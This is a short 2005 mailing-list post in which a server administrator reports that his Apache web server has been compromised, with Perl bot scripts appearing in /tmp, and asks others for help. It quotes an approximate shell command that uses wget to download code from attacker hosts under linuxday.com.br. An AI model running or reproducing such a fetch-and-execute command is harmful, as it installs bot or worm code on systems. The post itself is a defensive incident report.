Server compromissed

paul at topguncomputers.com paul at topguncomputers.com
Fri Feb 18 06:20:02 UTC 2005

Apparently someone has hacked into my webserver.  And is installing perl
scripts into he /tmp/ directory.  There usually named .linuxday* or
.cinta* and a few other names as well.

>From what I can tell something is causing apache to run a command like "sh
wget  bot.linuxday.com.br -O {the above mentioned files are than listed}"

sometimes the site is worm.linuxday.com.br

I'm curious if anyone has heard about this before.  I'm currently running
Fedora 1  with all the latests security patches.